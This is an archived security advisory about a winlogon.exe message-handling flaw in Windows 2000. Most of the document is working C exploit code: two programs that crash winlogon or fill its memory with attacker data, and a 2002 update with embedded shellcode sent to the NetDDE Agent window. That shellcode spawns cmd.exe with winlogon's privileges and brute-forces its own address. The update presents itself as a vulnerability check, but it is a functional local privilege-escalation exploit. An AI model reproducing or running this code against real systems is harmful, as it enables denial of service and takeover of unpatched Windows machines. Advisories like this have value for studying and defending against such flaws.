16th Feb 2001 [SBWID-2016]
COMMAND
winlogon
SYSTEMS AFFECTED
Win2000
PROBLEM
'ryagin' found following. As well as recent "NetDDE Agent"
window hosted by winlogon.exe, there is one another window: "MM
Notify Callback". It is hosted by winmm.dll which is loaded into
winlogon.exe.
Windows procedure seems to handle few messages, WM_CREATE,
WM_DESTROY, WM_CLOSE, WM_TIMER, and, the most interesting,
WM_DEVICECHANGE.
The primary role of WM_DEVICECHANGE message is informing the
user-space environment about device plug/unplug and related
issues.
The "MM Notify Callback" window analyses only "MM Notify Callback"
DBT_DEVICEARRIVAL [0x8000] and DBT_DEVICEREMOVECOMPLETE [0x8004]
sub-messages (arriving from wParam).
When it gots this messages, it reads data structure, interpreting
lParam as pointer. Data structure must have value 0x00000005 at
offset+0x4 and must have special GUID value at offset+0xC, and
must have null-terminated uncode string ot offset+0x1C.
This issue most probably cannot serve for executing code with
SYSTEM priveleges, but this requires more accurate research.
Quick look at winmm.dll code shows that supplied structure doesn't
used in copy operations into random memory addresses, however, you
can fill region of winlogon's memory with practically any
user-supplied data (the only prohibited value is unicode 0x0000
string terminator).
This can be used as shellcode for another winlogon's bug, for
example. Nevertheless, by running exploit from the bottom of
message, you can crash winlogon.exe with access violation.
Thus have little value for ordinary Workstations and Servers, but
can be used to DoS against Terminal Servers.
Exploit 1: crashes winlogon with access violation
Exploit 2: inject data string of 'ABCD' x 0x1000 (in unicode) into
winlogon memory space
----- exploit 1-------
#include <windows.h>
#include <stdio.h>
DWORD exploit[]={0x11223344,0x5, 0x55667788,
0x6994AD04,0x11D093EF,0xA000CCA3,0x963122C9
};
int main()
{
HWND hwnd=FindWindow("MM Notify Callback","MM Notify Callback");
printf("Window=%x\n",hwnd);
SendMessage(hwnd, WM_DEVICECHANGE, 0x8000,0x00000000);
// ^^^^^^^^^^ AV address
return 0;
}
----- exploit 2-------
#include <windows.h>
#include <stdio.h>
DWORD exploit[]={0x11223344,0x5, 0x55667788,
0x6994AD04,0x11D093EF,0xA000CCA3,0x963122C9
};
int main()
{
DWORD *ptr;
DWORD i,j;
HWND hwnd=FindWindow("MM Notify Callback","MM Notify Callback");
printf("Window=%x\n",hwnd);
ptr = (DWORD*)malloc(0x1000*4+sizeof(exploit));
for(i=0;i<sizeof(exploit)/sizeof(exploit[0]);i++)
ptr[i]=exploit[i];
for(j=0;j<0x1000;j++) ptr[i+j]='ABCD';
SendMessage(hwnd, WM_DEVICECHANGE, 0x8000,(DWORD)ptr);
return 0;
}
Update (21 October 2002)
======
Exploit W2K sp1-sp3 ...
//
/////////// Copyright © 2002 Serus ////////////////
//mailto:serus@users.mns.ru
//
//This program check system on winlogon bug present
//Only for Windows 2000
//This is for check use only!
//
#include <windows.h>
#include <stdio.h>
void main(int argc, char *argv[ ], char *envp[ ] )
{
char *buf;
DWORD Addr = 0;
BOOL bExec = TRUE;
unsigned char sc[] = { // my simple shellcode, it calls CreateProcess function,
// executes cmd.exe on user`s desktop and creates mutex.
0x8B, 0xF4,
0x68, 0x53, 0x45, 0x52, 0x00,
0x8B, 0xDC, 0x54, 0x6A, 0x00, 0x6A, 0x00,
0xB8, 0xC8, 0xD7, 0xE8, 0x77, 0xFF, 0xD0, 0x8B, 0xE6,
0x6A, 0x00, 0x68, 0x2E, 0x65, 0x78, 0x65, 0x68, 0x00,
0x63, 0x6D, 0x64, 0x68, 0x61, 0x75, 0x6C, 0x74, 0x68, 0x5C, 0x44,
0x65, 0x66, 0x68, 0x53, 0x74, 0x61, 0x30, 0x68, 0x00, 0x57, 0x69,
0x6E, 0x8B, 0xD4, 0x42, 0xB9, 0x50, 0x00, 0x00, 0x00, 0x6A, 0x00,
0xE2, 0xFC, 0x6A, 0x44, 0x83, 0xC4, 0x0C, 0x52, 0x83, 0xEC, 0x0C,
0x8B, 0xC4, 0x83, 0xC0, 0x10, 0x50, 0x8B, 0xC4, 0x83, 0xC0, 0x08,
0x50, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00,
0x6A, 0x00, 0x83, 0xC2, 0x10, 0x52, 0x6A, 0x00, 0xB8, 0x4D, 0xA4,
0xE9, 0x77, 0xFF, 0xD0, 0x8B, 0xE6, 0xC3
};
HWND hWnd;
COPYDATASTRUCT cds;
HMODULE hMod;
DWORD ProcAddr;
HANDLE hMutex;
char mutname[4];
printf("\n\n==== GetAd by Serus (serus@users.mns.ru) ====");
// Get NetDDE Window
hWnd = FindWindow("NDDEAgnt","NetDDE Agent");
if(hWnd == NULL)
{
MessageBox(NULL, "Couldn't find NetDDE agent window", "Error", MB_OK | MB_ICONSTOP);
return;
}
// Get CreateProcessA and CreateMutexA entry addresses
hMod = GetModuleHandle("kernel32.dll");
ProcAddr = (DWORD)GetProcAddress(hMod, "CreateProcessA");
if(ProcAddr == 0)
{
MessageBox(NULL, "Couldn't get CreateProcessA address", "Error", MB_OK | MB_ICONSTOP);
return;
}
*(DWORD *)(sc + 86 + 21) = ProcAddr;
ProcAddr = (DWORD)GetProcAddress(hMod, "CreateMutexA");
if(ProcAddr == 0)
{
MessageBox(NULL, "Couldn't get CreateProcessA address", "Error", MB_OK | MB_ICONSTOP);
return;
}
*(DWORD *)(sc + 15) = ProcAddr;
//Generate random Mutex name
srand(GetTickCount());
do
{
mutname[0] = 97 + rand()%25;
mutname[1] = 65 + rand()%25;
mutname[2] = 65 + rand()%25;
mutname[3] = 0;
}
while((hMutex = OpenMutex(MUTEX_ALL_ACCESS, 0, mutname)) != 0);
memcpy(sc + 3, mutname, 4);
//Form buffer for SendMessage
buf = (char *)malloc(1000);
memset(buf, 0xC3, 1000);
memcpy(buf, sc, sizeof(sc));
cds.cbData = 1000;
cds.dwData = 0;
cds.lpData=(PVOID)buf;
//If first login
//Send shellcode buffer
SendMessage(hWnd, WM_COPYDATA, (WPARAM)hWnd, (LPARAM)&cds);
//Try execute it at 0x0080FA78
PostMessage(hWnd, WM_TIMER, 1, (LPARAM)0x0080FA78);
printf("\n\nTrying at 0x%X", 0x0080FA78);
//If fails (perhaps not first login)
//Try to bruteforce shellcode addresss
for(Addr = 0x0120fa78; Addr < 0x10000000; Addr += 0x10000)
{
//If mutex exists, shellcode has been executed
if((hMutex = OpenMutex(MUTEX_ALL_ACCESS, 0, mutname)) != 0)
{
//Success
printf("\nSuccess!!!\n");
printf("\nWarning! You system has vulnerability!\n");
CloseHandle(hMutex);
return;
}
printf("\rTrying at 0x%X", Addr);
SendMessage(hWnd, WM_COPYDATA, (WPARAM)hWnd, (LPARAM)&cds);
PostMessage(hWnd, WM_TIMER, 1, (LPARAM)Addr);
}
//Bug in winlogon not presents
printf("\n\nBad luck! Reboot and try again.\n\n");
}
SOLUTION
Nothing yet.
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH
